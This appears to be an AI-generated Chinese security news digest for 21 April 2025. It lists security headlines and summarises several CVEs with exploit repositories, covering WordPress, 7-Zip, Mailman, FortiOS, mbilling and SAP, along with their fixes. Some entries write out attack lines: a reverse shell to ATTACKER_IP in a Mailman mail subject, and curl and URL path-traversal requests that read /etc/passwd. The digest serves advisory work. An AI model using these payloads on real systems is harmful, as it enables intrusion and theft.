23 KiB
安全资讯日报 2025-04-21
本文由AI自动生成,基于对安全相关仓库、CVE和最新安全研究成果的自动化分析。
更新时间:2025-04-21 04:08:48
今日资讯
🔍 漏洞分析
- Nosql注入学习记录
- 杭州师范大学TGCTF web 全解
- UNACMS PHP对象注入漏洞CVE-2025-32101
- 别等了,用AIFuzzing越权工具去捡洞吧!
- CentreStack 反序列化漏洞 CVE-2025-30406
- XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧
- 三星-WLAN-AP-WEA453e路由器-远程命令执行漏洞
- 三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞
- Bottle 框架漏洞攻防实录:从原型链污染到 Flag 获取的完整渗透路径
🔬 安全研究
🎯 威胁情报
🛠️ 安全工具
- 后渗透工具e0e1-config 1.30版本发布新增ie浏览器、回退go版本
- 工具推荐 | 一款替代Frp完美消除网络特征的内网穿透神器
- BurpSuite AI插件 -- EnhancedBurpGPT4月17日更新
- 随波逐流OCR识别工具 V4.0 20250420
📚 最佳实践
- 技术干货NetStumbler无线网络探测全攻略:从入门到实战
- 网络安全较量:利用自动化渗透测试构建弹性
- 云环境集权主机安全可用性保障方案
- 2025年国际顶级安全框架
- 部署安全态势管理的必要性是几何?
🍉 吃瓜新闻
- 创业有风险,投资需谨慎
- 警惕!英、韩、德或将成为美国首选第三方国防供应商合作伙伴
- 请立即拿下软考证书(政策风口)
- 去省厅还是留在腾讯...
- VIVO招聘安全专家
- 数字认证2024年年度报告:营收11.22亿元,同比上升15.43%,人均创收76.20万元
📌 其他
安全分析
(2025-04-21)
本文档包含 AI 对安全相关内容的自动化分析结果。概览
CVE-2024-25600 - Bricks Builder插件RCE漏洞
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2024-25600 |
| 风险等级 | CRITICAL |
| 利用状态 | 漏洞利用可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 16:00:06 |
📦 相关仓库
💡 分析概述
该仓库提供了针对WordPress Bricks Builder插件的CVE-2024-25600漏洞的Exploit。 仓库核心功能是检测目标WordPress站点是否受到该漏洞的影响,并提供一个交互式shell,用于执行任意命令。 仓库的最新提交修改了README.md文件,改进了对漏洞的描述、使用说明,以及添加了下载Exploit的链接。 提交还包含修复bug的内容。该漏洞是由于Bricks Builder插件中存在未授权的远程代码执行漏洞,攻击者可以通过构造恶意请求执行任意PHP代码。 攻击者利用漏洞,可以完全控制网站,窃取数据,或传播恶意软件。Exploit通过获取nonce值,构造恶意请求,并解析响应来验证漏洞。 漏洞利用方式:通过构造恶意POST请求,在wp-json/bricks/v1/render_element端点注入恶意代码实现RCE。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | WordPress Bricks Builder插件的未授权RCE漏洞 |
| 2 | 攻击者可执行任意PHP代码,导致完全控制 |
| 3 | 提供交互式shell,方便命令执行 |
| 4 | 影响Bricks Builder插件1.9.6及以下版本 |
🛠️ 技术细节
漏洞原理:Bricks Builder插件在处理用户输入时存在漏洞,允许未授权用户执行任意PHP代码。
利用方法:通过向
/wp-json/bricks/v1/render_element端点发送构造的POST请求,注入恶意代码。
修复方案:升级Bricks Builder插件至1.9.6以上版本。
🎯 受影响组件
• Bricks Builder插件
• WordPress
⚡ 价值评估
展开查看详细评估
该漏洞影响广泛使用的WordPress插件,且存在明确的利用方法,可导致RCE,对网站安全造成严重威胁。
CVE-2025-0411 - 7-Zip MotW Bypass 漏洞
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2025-0411 |
| 风险等级 | HIGH |
| 利用状态 | POC可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 15:47:37 |
📦 相关仓库
💡 分析概述
该仓库提供了针对7-Zip的CVE-2025-0411漏洞的PoC。该漏洞允许绕过Mark-of-the-Web (MotW)保护,从而导致任意代码执行。仓库提供了POC场景,演示了如何通过构造恶意压缩包绕过MotW保护。最近的更新主要集中在更新README文件,包括修复CVE链接,更新logo和下载链接,以及补充关于漏洞和POC使用的详细信息。漏洞利用方式是构造特制的7z压缩包,利用7-Zip在处理压缩包时未正确传递MotW信息的特性,使得解压后的文件绕过安全警告,从而实现代码执行。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | 7-Zip 存在 MotW 绕过漏洞 |
| 2 | 影响 7-Zip 的多个版本 |
| 3 | 提供 POC 代码,验证漏洞可行性 |
| 4 | 恶意压缩包可导致代码执行 |
🛠️ 技术细节
漏洞原理:7-Zip 在处理压缩文件时,未正确传递Mark-of-the-Web (MotW)信息,导致解压后的文件绕过安全警告。
利用方法:构造一个经过特殊处理的7z压缩文件。诱导用户打开该压缩文件。当用户解压文件时,其中的恶意文件将不会受到MotW保护,从而可以执行恶意代码。
修复方案:升级到7-Zip 24.09或更高版本,或者谨慎打开来自不可信来源的压缩文件。
🎯 受影响组件
• 7-Zip
⚡ 价值评估
展开查看详细评估
该漏洞影响广泛使用的7-Zip软件,提供了明确的利用方法和POC,可以绕过安全机制,执行任意代码,危害较大。
CVE-2025-43920 - Mailman 2.1命令注入漏洞
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2025-43920 |
| 风险等级 | CRITICAL |
| 利用状态 | POC可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 15:35:19 |
📦 相关仓库
💡 分析概述
该仓库最初仅包含一个README.md文件,用于声明CVE-2025-43920。该漏洞是一个存在于GNU Mailman 2.1.39(cPanel/WHM捆绑包)中的命令注入漏洞。攻击者可以通过构造恶意的邮件主题来利用此漏洞,当配置了外部归档器时,恶意邮件主题中的shell元字符将未被正确处理,从而导致任意命令执行。最新提交更新了README.md文件,详细描述了漏洞,包括漏洞概述、详细信息、利用方法(PoC)、攻击向量、安全影响、缓解措施以及时间线等。利用此漏洞,攻击者可以获得对服务器的完全控制权,因此风险极高。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | Mailman 2.1.39 存在命令注入漏洞 |
| 2 | 攻击者构造恶意邮件主题,注入shell命令 |
| 3 | 漏洞利用需配置外部归档器 |
| 4 | 可导致远程代码执行和系统完全控制 |
| 5 | Mailman 2.1.x已停止维护 |
🛠️ 技术细节
漏洞原理:当配置外部归档器时,邮件主题未对shell元字符进行过滤,导致命令注入。
利用方法:发送包含恶意shell命令的邮件主题,例如:Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
修复方案:禁用外部归档器,或者升级到Mailman 3.x,或者在配置外部归档器时对邮件主题进行严格的输入验证和过滤。
🎯 受影响组件
• GNU Mailman 2.1.39 (cPanel/WHM 捆绑包)
• 外部归档器配置
⚡ 价值评估
展开查看详细评估
该漏洞影响广泛使用的Mailman邮件列表管理软件,且存在明确的利用方法和POC,可以导致远程代码执行和系统完全控制,危害严重,价值极高。
CVE-2025-43919 - Mailman 2.1 目录遍历漏洞
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2025-43919 |
| 风险等级 | HIGH |
| 利用状态 | POC可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 15:34:15 |
📦 相关仓库
💡 分析概述
该仓库包含关于CVE-2025-43919的漏洞信息,该漏洞是GNU Mailman 2.1.39 (cPanel/WHM Bundle)中的一个目录遍历漏洞。仓库的README.md文件详细描述了该漏洞,包括漏洞概述、细节、POC、攻击向量、安全影响、缓解措施、时间线和参考资料。最新提交增加了详细的漏洞信息,包括漏洞描述、POC和缓解措施。
该漏洞允许未授权的攻击者通过构造恶意的请求读取服务器上的任意文件,例如/etc/passwd。利用方式是通过POST请求到/mailman/private/mailman,并修改username参数来构造目录遍历。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | Mailman 2.1.39 目录遍历漏洞 |
| 2 | 未授权访问,可读取任意文件 |
| 3 | 影响范围:信息泄露 |
| 4 | 利用简单,存在POC |
🛠️ 技术细节
漏洞原理:
/mailman/private/mailmanendpoint 的username参数未进行输入验证,允许../序列进行目录遍历。
利用方法:构造 POST 请求,修改 username 参数,例如:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
修复方案:升级到 Mailman 3.x,或通过web服务器配置限制对
/mailman/private的访问。
🎯 受影响组件
• GNU Mailman 2.1.39 (bundled with cPanel/WHM)
• private.py CGI script
⚡ 价值评估
展开查看详细评估
漏洞影响广泛使用的邮件列表管理系统,存在明确的POC和利用方法,且影响关键信息泄露,危害较高。
CVE-2025-30567 - WordPress WP01 路径穿越漏洞
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2025-30567 |
| 风险等级 | HIGH |
| 利用状态 | POC可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 15:03:47 |
📦 相关仓库
💡 分析概述
该仓库是一个针对WordPress WP01插件的路径穿越漏洞的PoC。整体仓库提供了PoC代码,以及详细的README文档,README文档详细介绍了漏洞的概述、细节、安装、使用方法、以及贡献方式和LICENSE。最近的更新增加了pytransform相关的代码,初步分析可以推测是加壳保护相关代码。但其和漏洞利用关系不大,主要更新在README.md文件中,包含了漏洞的描述、影响、利用方法等。PoC代码已提供,理论上可以进行漏洞利用测试,验证漏洞的存在。
漏洞利用方式: 根据README.md中的描述,该路径穿越漏洞允许攻击者访问服务器上任意文件。利用该漏洞的关键在于构造恶意的URL,通过路径穿越字符(如../)来访问目标文件。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | WordPress WP01插件存在路径穿越漏洞。 |
| 2 | 漏洞允许读取服务器上任意文件。 |
| 3 | 仓库提供了PoC代码和详细的利用说明。 |
| 4 | 受影响版本为WordPress WP01的所有未修复版本。 |
🛠️ 技术细节
漏洞原理是由于WP01插件未对用户输入的文件路径进行充分的验证和过滤,导致攻击者可以通过构造特殊的文件路径来访问服务器上的任意文件。
利用方法是构造包含路径穿越字符的URL,例如:
http://your-wordpress-site.com/wp01/file.php?path=../../../../etc/passwd。通过这种方式可以读取服务器上的敏感文件,如/etc/passwd。
修复方案:WP01插件需要对用户输入的文件路径进行严格的验证,确保路径不包含路径穿越字符,并限制文件访问的范围。
🎯 受影响组件
• WordPress WP01插件
⚡ 价值评估
展开查看详细评估
该漏洞影响广泛使用的WordPress插件,具有明确的利用方法,并且提供了POC代码,可以验证漏洞的存在。攻击者可以利用该漏洞读取服务器上的任意文件,存在极高的安全风险,因此具有较高的价值。
CVE-2024-55591 - FortiOS认证绕过漏洞扫描工具
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2024-55591 |
| 风险等级 | HIGH |
| 利用状态 | POC可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 14:49:51 |
📦 相关仓库
💡 分析概述
该仓库提供了一个针对FortiOS认证绕过漏洞(CVE-2024-55591)的扫描工具。仓库包含一个名为scanner-cve2024-55591.py的Python脚本,用于检测FortiOS设备是否存在此漏洞。该脚本通过构造特定的HTTP请求来尝试绕过身份验证。同时,仓库中README.md文件提供了关于漏洞利用、解密凭据、受影响版本和缓解措施的说明。代码更新主要集中在scanner-cve2024-55591.py,增加了对漏洞的检测逻辑和Telegram通知功能,以及README.md文件的更新,添加了下载链接。漏洞的利用方式是,通过发送特定的HTTP请求绕过身份验证,从而实现未授权访问。目前,该工具仅用于检测,未提供直接的利用代码,但提供了POC。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | 针对FortiOS认证绕过漏洞 (CVE-2024-55591) 的扫描工具 |
| 2 | 提供Python脚本用于检测漏洞 |
| 3 | 包含Telegram通知功能,发现漏洞后发送警报 |
| 4 | 通过构造特定的HTTP请求来尝试绕过身份验证 |
| 5 | 扫描工具提供POC |
🛠️ 技术细节
漏洞原理:通过发送特定的HTTP请求绕过FortiOS的身份验证机制。
利用方法:使用提供的Python脚本,扫描目标IP地址,检测是否存在漏洞。脚本会发送特定的HTTP请求,并根据响应结果判断是否存在漏洞。
修复方案:在FortiOS设备上应用安全补丁,升级到已修复的版本。
🎯 受影响组件
• FortiOS
⚡ 价值评估
展开查看详细评估
该仓库提供了针对FortiOS认证绕过漏洞的扫描工具,具有明确的漏洞检测方法和POC。 影响范围明确,且该漏洞一旦被利用可能导致未授权访问,风险较高。
CVE-2023-30258 - mbilling冰淇淋支付RCE漏洞
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2023-30258 |
| 风险等级 | CRITICAL |
| 利用状态 | 漏洞利用可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 16:18:37 |
📦 相关仓库
💡 分析概述
该漏洞涉及mbilling系统中的icepay组件,通过构造恶意请求,可以触发远程代码执行(RCE)。仓库代码包含一个poc.py文件,用于演示漏洞利用。该文件构造了针对目标URL的GET请求,将包含反弹shell的payload作为参数传递,从而实现RCE。具体来说,poc.py构造了一个URL,将反弹shell的命令通过urllib.parse.quote_plus编码后,拼接在URL的democ参数中。目标系统在处理该参数时,会执行该恶意命令。最新提交的poc.py文件更新了代码,移除了不必要的注释和代码行,但核心的漏洞利用逻辑未变。该漏洞利用方式清晰,具备较高的危害性。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | 冰淇淋支付组件存在命令注入漏洞 |
| 2 | 漏洞利用方式为构造恶意URL |
| 3 | 通过反弹shell实现远程代码执行 |
| 4 | POC代码已公开,易于复现 |
🛠️ 技术细节
漏洞原理:目标系统在处理icepay组件的democ参数时,未对用户输入进行充分的过滤和验证,导致命令注入。
利用方法:构造包含恶意命令的URL,例如:http://10.10.2.238/mbilling/lib/icepay/icepay.php?democ=恶意命令。
修复方案:对用户输入进行严格的过滤和验证,例如使用白名单机制,或者对特殊字符进行转义。
🎯 受影响组件
• mbilling
• icepay组件
⚡ 价值评估
展开查看详细评估
该漏洞存在远程代码执行(RCE)风险,有明确的利用方法和POC,且影响关键组件,价值高。
CVE-2025-0054 - SAP NetWeaver Java Stored XSS
📌 漏洞信息
| 属性 | 详情 |
|---|---|
| CVE编号 | CVE-2025-0054 |
| 风险等级 | HIGH |
| 利用状态 | POC可用 |
| 发布时间 | 2025-04-20 00:00:00 |
| 最后更新 | 2025-04-20 16:07:12 |
📦 相关仓库
💡 分析概述
该仓库提供了一个针对SAP NetWeaver Java系统CVE-2025-0054的存储型XSS漏洞的扫描工具。仓库包含了README.md文件,详细介绍了漏洞信息、工具功能、使用方法以及免责声明。此外,scanner.py文件实现了XSS payload的提交和反射检测功能,通过发送POST请求提交payload,然后获取页面并检查payload是否被存储。该漏洞允许攻击者注入恶意JavaScript代码,当用户访问受影响页面时,恶意代码将被执行,可能导致会话劫持、信息窃取等安全问题。该工具提供了基本的XSS扫描功能,但需要手动配置目标URL、登录信息、易受攻击的端点和XSS payload。
🔍 关键发现
| 序号 | 发现内容 |
|---|---|
| 1 | Stored XSS vulnerability in SAP NetWeaver Java. |
| 2 | Provides a Python-based scanner for detecting the vulnerability. |
| 3 | Requires manual configuration of target and payload. |
| 4 | Allows potential for session hijacking and information theft. |
| 5 | Has a clear POC implementation. |
🛠️ 技术细节
The scanner submits a POST request with a crafted XSS payload to a vulnerable endpoint.
The scanner fetches the page to check for the presence of the injected script.
The vulnerability lies in the lack of proper input sanitization, allowing malicious script to be stored and executed.
The exploit involves injecting malicious JavaScript code into a specific field.
The fix should involve output encoding or input validation to prevent XSS attacks.
🎯 受影响组件
• SAP NetWeaver Application Server Java
⚡ 价值评估
展开查看详细评估
该漏洞影响广泛使用的SAP NetWeaver Java系统,存在明确的利用方法(使用提供的POC代码提交XSS payload),以及详细的漏洞描述,POC代码已提供,扫描器可以帮助验证和检测此漏洞。
免责声明
本文内容由 AI 自动生成,仅供参考和学习交流。文章中的观点和建议不代表作者立场,使用本文信息需自行承担风险和责任。